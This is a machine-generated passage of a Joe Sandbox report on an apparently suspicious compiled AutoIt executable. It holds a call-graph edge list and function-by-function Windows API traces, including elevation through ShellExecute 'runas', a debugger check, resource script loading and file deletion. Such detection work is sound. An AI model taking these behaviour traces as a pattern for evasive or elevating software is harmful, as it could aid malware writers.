105663->105639 105668 1038c40 105664->105668 105665 1038cf8 105697 1038f35 105665->105697 105667 1038a05 74 API calls 105667->105668 105668->105665 105668->105667 105671 1038c02 105668->105671 105693 1038e12 105668->105693 105701 1038aa1 74 API calls 105668->105701 105672 1038d0d 105671->105672 105673 1038d20 105672->105673 105674 1038d1a 105672->105674 105676 1038d31 105673->105676 105677 ff2d55 _free 58 API calls 105673->105677 105675 
ff2d55 _free 58 API calls 105674->105675 105675->105673 105678 1038c09 105676->105678 105679 ff2d55 _free 58 API calls 105676->105679 105677->105676 105678->105647 105680 ff53a6 105678->105680 105679->105678 105681 ff53b2 _fprintf 105680->105681 105682 ff53de 105681->105682 105683 ff53c6 105681->105683 105686 ff6c11 __lock_file 59 API calls 105682->105686 105690 ff53d6 _fprintf 105682->105690 105750 ff8b28 58 API calls __getptd_noexit 105683->105750 105685 ff53cb 105751 ff8db6 9 API calls __mbschr_l 105685->105751 105688 ff53f0 105686->105688 105734 ff533a 105688->105734 105690->105647 105694 1038e61 105693->105694 105696 1038e21 105693->105696 105694->105696 105702 1038ee8 105694->105702 105696->105668 105698 1038f42 105697->105698 105699 1038f53 105697->105699 105700 ff4863 80 API calls 105698->105700 105699->105671 105700->105699 105701->105668 105703 1038f14 105702->105703 105704 1038f25 105702->105704 105706 ff4863 105703->105706 105704->105694 105707 ff486f _fprintf 105706->105707 105708 ff488d 105707->105708 105709 ff48a5 105707->105709 105711 ff489d _fprintf 105707->105711 105731 ff8b28 58 API calls __getptd_noexit 105708->105731 105712 ff6c11 __lock_file 59 API calls 105709->105712 105711->105704 105714 ff48ab 105712->105714 105713 ff4892 105732 ff8db6 9 API calls __mbschr_l 105713->105732 105719 ff470a 105714->105719 105722 ff4719 105719->105722 105725 ff4737 105719->105725 105720 ff4727 105721 ff8b28 _free 58 API calls 105720->105721 105723 ff472c 105721->105723 105722->105720 105722->105725 105730 ff4751 _memmove 105722->105730 105724 ff8db6 __mbschr_l 9 API calls 105723->105724 105724->105725 105733 ff48dd LeaveCriticalSection LeaveCriticalSection __wfsopen 105725->105733 105726 ffae1e __flsbuf 78 API calls 105726->105730 105727 ff4a3d __flush 78 API calls 105727->105730 105728 ff46e6 __output_l 58 API calls 105728->105730 105729 ffd886 __write 78 API calls 105729->105730 105730->105725 105730->105726 105730->105727 105730->105728 105730->105729 
105731->105713 105732->105711 105733->105711 105735 ff5349 105734->105735 105738 ff535d 105734->105738 105789 ff8b28 58 API calls __getptd_noexit 105735->105789 105737 ff5359 105752 ff5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105737->105752 105738->105737 105753 ff4a3d 105738->105753 105739 ff534e 105790 ff8db6 9 API calls __mbschr_l 105739->105790 105745 ff46e6 __output_l 58 API calls 105746 ff5377 105745->105746 105763 1000a02 105746->105763 105748 ff537d 105748->105737 105749 ff2d55 _free 58 API calls 105748->105749 105749->105737 105750->105685 105751->105690 105752->105690 105754 ff4a50 105753->105754 105758 ff4a74 105753->105758 105755 ff46e6 __output_l 58 API calls 105754->105755 105754->105758 105756 ff4a6d 105755->105756 105791 ffd886 105756->105791 105759 1000b77 105758->105759 105760 ff5371 105759->105760 105761 1000b84 105759->105761 105760->105745 105761->105760 105762 ff2d55 _free 58 API calls 105761->105762 105762->105760 105764 1000a0e _fprintf 105763->105764 105765 1000a32 105764->105765 105766 1000a1b 105764->105766 105767 1000abd 105765->105767 105769 1000a42 105765->105769 105916 ff8af4 58 API calls __getptd_noexit 105766->105916 105921 ff8af4 58 API calls __getptd_noexit 105767->105921 105772 1000a60 105769->105772 105773 1000a6a 105769->105773 105771 1000a20 105917 ff8b28 58 API calls __getptd_noexit 105771->105917 105918 ff8af4 58 API calls __getptd_noexit 105772->105918 105778 ffd206 ___lock_fhandle 59 API calls 105773->105778 105774 1000a65 105922 ff8b28 58 API calls __getptd_noexit 105774->105922 105776 1000a27 _fprintf 105776->105748 105780 1000a70 105778->105780 105782 1000a83 105780->105782 105783 1000a8e 105780->105783 105781 1000ac9 105923 ff8db6 9 API calls __mbschr_l 105781->105923 105901 1000add 105782->105901 105919 ff8b28 58 API calls __getptd_noexit 105783->105919 105787 1000a89 105920 1000ab5 LeaveCriticalSection __unlock_fhandle 105787->105920 105789->105739 105790->105737 105792 ffd892 _fprintf 105791->105792 
105793 ffd89f 105792->105793 105794 ffd8b6 105792->105794 105892 ff8af4 58 API calls __getptd_noexit 105793->105892 105795 ffd955 105794->105795 105797 ffd8ca 105794->105797 105898 ff8af4 58 API calls __getptd_noexit 105795->105898 105800 ffd8e8 105797->105800 105801 ffd8f2 105797->105801 105799 ffd8a4 105893 ff8b28 58 API calls __getptd_noexit 105799->105893 105894 ff8af4 58 API calls __getptd_noexit 105800->105894 105819 ffd206 105801->105819 105802 ffd8ed 105899 ff8b28 58 API calls __getptd_noexit 105802->105899 105804 ffd8ab _fprintf 105804->105758 105807 ffd8f8 105809 ffd91e 105807->105809 105810 ffd90b 105807->105810 105895 ff8b28 58 API calls __getptd_noexit 105809->105895 105828 ffd975 105810->105828 105811 ffd961 105900 ff8db6 9 API calls __mbschr_l 105811->105900 105815 ffd923 105896 ff8af4 58 API calls __getptd_noexit 105815->105896 105817 ffd917 105897 ffd94d LeaveCriticalSection __unlock_fhandle 105817->105897 105820 ffd212 _fprintf 105819->105820 105821 ffd261 EnterCriticalSection 105820->105821 105822 ff9c0b __lock 58 API calls 105820->105822 105823 ffd287 _fprintf 105821->105823 105824 ffd237 105822->105824 105823->105807 105825 ffd24f 105824->105825 105827 ff9e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 105824->105827 105826 ffd28b ___lock_fhandle LeaveCriticalSection 105825->105826 105826->105821 105827->105825 105829 ffd982 __ftell_nolock 105828->105829 105830 ffd9c1 105829->105830 105831 ffd9e0 105829->105831 105863 ffd9b6 105829->105863 105833 ff8af4 __write 58 API calls 105830->105833 105834 ffda1c 105831->105834 105835 ffda38 105831->105835 105832 ffc5f6 __woutput_l 6 API calls 105836 ffe1d6 105832->105836 105837 ffd9c6 105833->105837 105838 ff8af4 __write 58 API calls 105834->105838 105840 ffda51 105835->105840 105843 10018c1 __lseeki64_nolock 60 API calls 105835->105843 105836->105817 105839 ff8b28 _free 58 API calls 105837->105839 105841 ffda21 105838->105841 105842 ffd9cd 105839->105842 105844 1005c6b __stbuf 58 API calls 
105840->105844 105845 ff8b28 _free 58 API calls 105841->105845 105846 ff8db6 __mbschr_l 9 API calls 105842->105846 105843->105840 105847 ffda5f 105844->105847 105848 ffda28 105845->105848 105846->105863 105849 ffddb8 105847->105849 105853 ff99ac _LocaleUpdate::_LocaleUpdate 58 API calls 105847->105853 105852 ff8db6 __mbschr_l 9 API calls 105848->105852 105850 ffe14b WriteFile 105849->105850 105851 ffddd6 105849->105851 105854 ffddab GetLastError 105850->105854 105865 ffdd78 105850->105865 105855 ffdefa 105851->105855 105862 ffddec 105851->105862 105852->105863 105856 ffda8b GetConsoleMode 105853->105856 105854->105865 105858 ffdf05 105855->105858 105867 ffdfef 105855->105867 105856->105849 105859 ffdaca 105856->105859 105857 ffe184 105857->105863 105864 ff8b28 _free 58 API calls 105857->105864 105858->105857 105873 ffdf6a WriteFile 105858->105873 105859->105849 105860 ffdada GetConsoleCP 105859->105860 105860->105857 105888 ffdb09 105860->105888 105861 ffde5b WriteFile 105861->105854 105868 ffde98 105861->105868 105862->105857 105862->105861 105863->105832 105869 ffe1b2 105864->105869 105865->105857 105865->105863 105866 ffded8 105865->105866 105870 ffe17b 105866->105870 105871 ffdee3 105866->105871 105867->105857 105872 ffe064 WideCharToMultiByte 105867->105872 105868->105862 105880 ffdebc 105868->105880 105874 ff8af4 __write 58 API calls 105869->105874 105876 ff8b07 __dosmaperr 58 API calls 105870->105876 105875 ff8b28 _free 58 API calls 105871->105875 105872->105854 105885 ffe0ab 105872->105885 105873->105854 105877 ffdfb9 105873->105877 105874->105863 105878 ffdee8 105875->105878 105876->105863 105877->105858 105877->105865 105877->105880 105881 ff8af4 __write 58 API calls 105878->105881 105879 ffe0b3 WriteFile 105883 ffe106 GetLastError 105879->105883 105879->105885 105880->105865 105881->105863 105882 ff35f5 __write_nolock 58 API calls 105882->105888 105883->105885 105884 10062ba 60 API calls __write_nolock 105884->105888 105885->105865 105885->105867 
105885->105879 105885->105880 105886 1007a5e WriteConsoleW CreateFileW __putwch_nolock 105890 ffdc5f 105886->105890 105887 ffdbf2 WideCharToMultiByte 105887->105865 105889 ffdc2d WriteFile 105887->105889 105888->105865 105888->105882 105888->105884 105888->105887 105888->105890 105889->105854 105889->105890 105890->105854 105890->105865 105890->105886 105890->105888 105891 ffdc87 WriteFile 105890->105891 105891->105854 105891->105890 105892->105799 105893->105804 105894->105802 105895->105815 105896->105817 105897->105804 105898->105802 105899->105811 105900->105804 105924 ffd4c3 105901->105924 105903 1000b41 105937 ffd43d 59 API calls 2 library calls 105903->105937 105905 1000aeb 105905->105903 105906 1000b1f 105905->105906 105909 ffd4c3 __lseek_nolock 58 API calls 105905->105909 105906->105903 105907 ffd4c3 __lseek_nolock 58 API calls 105906->105907 105911 1000b2b CloseHandle 105907->105911 105908 1000b49 105912 1000b6b 105908->105912 105938 ff8b07 58 API calls 2 library calls 105908->105938 105910 1000b16 105909->105910 105913 ffd4c3 __lseek_nolock 58 API calls 105910->105913 105911->105903 105914 1000b37 GetLastError 105911->105914 105912->105787 105913->105906 105914->105903 105916->105771 105917->105776 105918->105774 105919->105787 105920->105776 105921->105774 105922->105781 105923->105776 105925 ffd4ce 105924->105925 105927 ffd4e3 105924->105927 105926 ff8af4 __write 58 API calls 105925->105926 105929 ffd4d3 105926->105929 105928 ff8af4 __write 58 API calls 105927->105928 105930 ffd508 105927->105930 105931 ffd512 105928->105931 105932 ff8b28 _free 58 API calls 105929->105932 105930->105905 105933 ff8b28 _free 58 API calls 105931->105933 105934 ffd4db 105932->105934 105935 ffd51a 105933->105935 105934->105905 105936 ff8db6 __mbschr_l 9 API calls 105935->105936 105936->105934 105937->105908 105938->105912 105940 ff079e __ftell_nolock 105939->105940 105941 ff079f GetLongPathNameW 105940->105941 105942 fd7bcc 59 API calls 105941->105942 105943 fd72bd 
105942->105943 105944 fd700b 105943->105944 105945 fd7667 59 API calls 105944->105945 105946 fd701d 105945->105946 105947 fd4750 60 API calls 105946->105947 105948 fd7028 105947->105948 105949 100e885 105948->105949 105950 fd7033 105948->105950 105954 100e89f 105949->105954 105997 fd7908 61 API calls 105949->105997 105952 fd3f74 59 API calls 105950->105952 105953 fd703f 105952->105953 105991 fd34c2 105953->105991 105956 fd7052 Mailbox 105956->104889 105958 fd4ddd 136 API calls 105957->105958 105959 fd688f 105958->105959 105960 100e031 105959->105960 105962 fd4ddd 136 API calls 105959->105962 105961 103955b 122 API calls 105960->105961 105963 100e046 105961->105963 105964 fd68a3 105962->105964 105965 100e067 105963->105965 105966 100e04a 105963->105966 105964->105960 105967 fd68ab 105964->105967 105969 ff0db6 Mailbox 59 API calls 105965->105969 105968 fd4e4a 84 API calls 105966->105968 105970 100e052 105967->105970 105971 fd68b7 105967->105971 105968->105970 105982 100e0ac Mailbox 105969->105982 106105 10342f8 90 API calls _wprintf 105970->106105 105998 fd6a8c 105971->105998 105974 100e060 105974->105965 105976 100e260 105977 ff2d55 _free 58 API calls 105976->105977 105978 100e268 105977->105978 105979 fd4e4a 84 API calls 105978->105979 105985 100e271 105979->105985 105982->105976 105982->105985 105988 fd7de1 59 API calls 105982->105988 106091 fd750f 105982->106091 106099 fd735d 105982->106099 106106 102f73d 59 API calls 2 library calls 105982->106106 106107 102f65e 61 API calls 2 library calls 105982->106107 106108 103737f 59 API calls Mailbox 105982->106108 105984 ff2d55 _free 58 API calls 105984->105985 105985->105984 105987 fd4e4a 84 API calls 105985->105987 106109 102f7a1 89 API calls 4 library calls 105985->106109 105987->105985 105988->105982 105992 fd34d4 105991->105992 105996 fd34f3 _memmove 105991->105996 105995 ff0db6 Mailbox 59 API calls 105992->105995 105993 ff0db6 Mailbox 59 API calls 105994 fd350a 105993->105994 105994->105956 105995->105996 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                      • Part of subcall function 00FE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FD3C14,010952F8,?,?,?), ref: 00FE096E
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01087770,00000010), ref: 0100D281
                                                                    • SetCurrentDirectoryW.KERNEL32(?,010952F8,?,?,?), ref: 0100D2B9
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01084260,010952F8,?,?,?), ref: 0100D33F
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0100D346
                                                                      • Part of subcall function 00FD3A46: GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
                                                                      • Part of subcall function 00FD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(00000063), ref: 00FD3A76
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(000000A4), ref: 00FD3A88
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(000000A2), ref: 00FD3A9A
                                                                      • Part of subcall function 00FD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
                                                                      • Part of subcall function 00FD3A46: RegisterClassExW.USER32(?), ref: 00FD3B16
                                                                      • Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
                                                                      • Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
                                                                      • Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
                                                                      • Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A41
                                                                      • Part of subcall function 00FD434A: _memset.LIBCMT ref: 00FD4370
                                                                      • Part of subcall function 00FD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415
                                                                    Strings
                                                                    • This is a third-party compiled AutoIt script., xrefs: 0100D279
                                                                    • runas, xrefs: 0100D33A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 529118366-3287110873
                                                                    • Opcode ID: fe9b457c96c3065d57b02f828ae25605364e60ae63fcc8c531b267b5e04b4d5d
                                                                    • Instruction ID: 2085e7ba9787c862204fef01ba17a4c9b360e6d410670c21a825fce01e5ab35b
                                                                    • Opcode Fuzzy Hash: fe9b457c96c3065d57b02f828ae25605364e60ae63fcc8c531b267b5e04b4d5d
                                                                    • Instruction Fuzzy Hash: B7513930D08209AEDF22FBF5DC15AFE7BB6BB05310F084097F5D1A6241DA795605EB21

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00FD49CD
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • GetCurrentProcess.KERNEL32(?,0105FAEC,00000000,00000000,?), ref: 00FD4A9A
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00FD4AA1
                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FD4AE7
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FD4AF2
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FD4B23
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FD4B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                    • String ID:
                                                                    • API String ID: 1986165174-0
                                                                    • Opcode ID: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
                                                                    • Instruction ID: 18dbd64c3c0ad944c535d433cb5d67a7ffdbf6bd345fb8e89b7acd5b2da5d2e9
                                                                    • Opcode Fuzzy Hash: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
                                                                    • Instruction Fuzzy Hash: 2391B7319897C1DFD732DBA885501AABFF6AF2A300F48499ED0CA93741D234F508D769

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4E99
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4EB0
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D937
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D94C
                                                                    • LockResource.KERNEL32(00FD4D8E,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F,00000000), ref: 0100D95F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
                                                                    • Instruction ID: 8332356c9bef3459f64b3ef6f1c6e4a228be947b84be4ed29df0c97b8b2d11ad
                                                                    • Opcode Fuzzy Hash: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
                                                                    • Instruction Fuzzy Hash: 0D11A0B5200301BFD7218BA5EC48F2B7BBAFBC5B51F24426DF445C6280DB76E8009761
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,0100E398), ref: 0103446A
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0103447B
                                                                    • FindClose.KERNEL32(00000000), ref: 0103448B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
                                                                    • Instruction ID: dc6cb4684833e28dfced3612052178071a7ed13dedc1eaedb3afa5f8915472b8
                                                                    • Opcode Fuzzy Hash: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
                                                                    • Instruction Fuzzy Hash: 77E0DF72810A026B9320AA38EC0D8EB779C9E45275F104766F9B5C20D0EFBD99008796
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0A5B
                                                                    • timeGetTime.WINMM ref: 00FE0D16
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0E53
                                                                    • Sleep.KERNEL32(0000000A), ref: 00FE0E61
                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00FE0EFA
                                                                    • DestroyWindow.USER32 ref: 00FE0F06
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE0F20
                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 01014E83
                                                                    • TranslateMessage.USER32(?), ref: 01015C60
                                                                    • DispatchMessageW.USER32(?), ref: 01015C6E
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01015C82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 4212290369-3242690629
                                                                    • Opcode ID: b338c457ec3f6fd9e51e70de6399495e6fae7c78ca477cf13dc0dd82d91fff84
                                                                    • Instruction ID: 1ae15566a6c1ea9762429854e80890b35ec507f061f322d0fbd0c60251f75ae5
                                                                    • Opcode Fuzzy Hash: b338c457ec3f6fd9e51e70de6399495e6fae7c78ca477cf13dc0dd82d91fff84
                                                                    • Instruction Fuzzy Hash: 0CB2D170608381DFD724DF24C894BAEBBE5BF85304F14495DE5C99B291CBB9E884DB82

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 01038F5F: __time64.LIBCMT ref: 01038F69
                                                                      • Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD
                                                                    • __wsplitpath.LIBCMT ref: 01039234
                                                                      • Part of subcall function 00FF40FB: __wsplitpath_helper.LIBCMT ref: 00FF413B
                                                                    • _wcscpy.LIBCMT ref: 01039247
                                                                    • _wcscat.LIBCMT ref: 0103925A
                                                                    • __wsplitpath.LIBCMT ref: 0103927F
                                                                    • _wcscat.LIBCMT ref: 01039295
                                                                    • _wcscat.LIBCMT ref: 010392A8
                                                                      • Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FDE
                                                                      • Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FED
                                                                    • _wcscmp.LIBCMT ref: 010391EF
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01039452
                                                                    • _wcsncpy.LIBCMT ref: 010394C5
                                                                    • DeleteFileW.KERNEL32(?,?), ref: 010394FB
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01039511
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039522
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039534
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1500180987-0
                                                                    • Opcode ID: a2a31e57106a1a2d71892864b56b09186b1884ce79cfae511b7d33ba5680d42e
                                                                    • Instruction ID: aa643aa1bb2c14bdb31f61d6b6893dc32d034dba78d89291f2a4865899266365
                                                                    • Opcode Fuzzy Hash: a2a31e57106a1a2d71892864b56b09186b1884ce79cfae511b7d33ba5680d42e
                                                                    • Instruction Fuzzy Hash: C7C15CB1D00219ABDF21DF94CC81EDEB7BDEF85304F0040A6E649E7251DB749A849F61

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00FD30F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
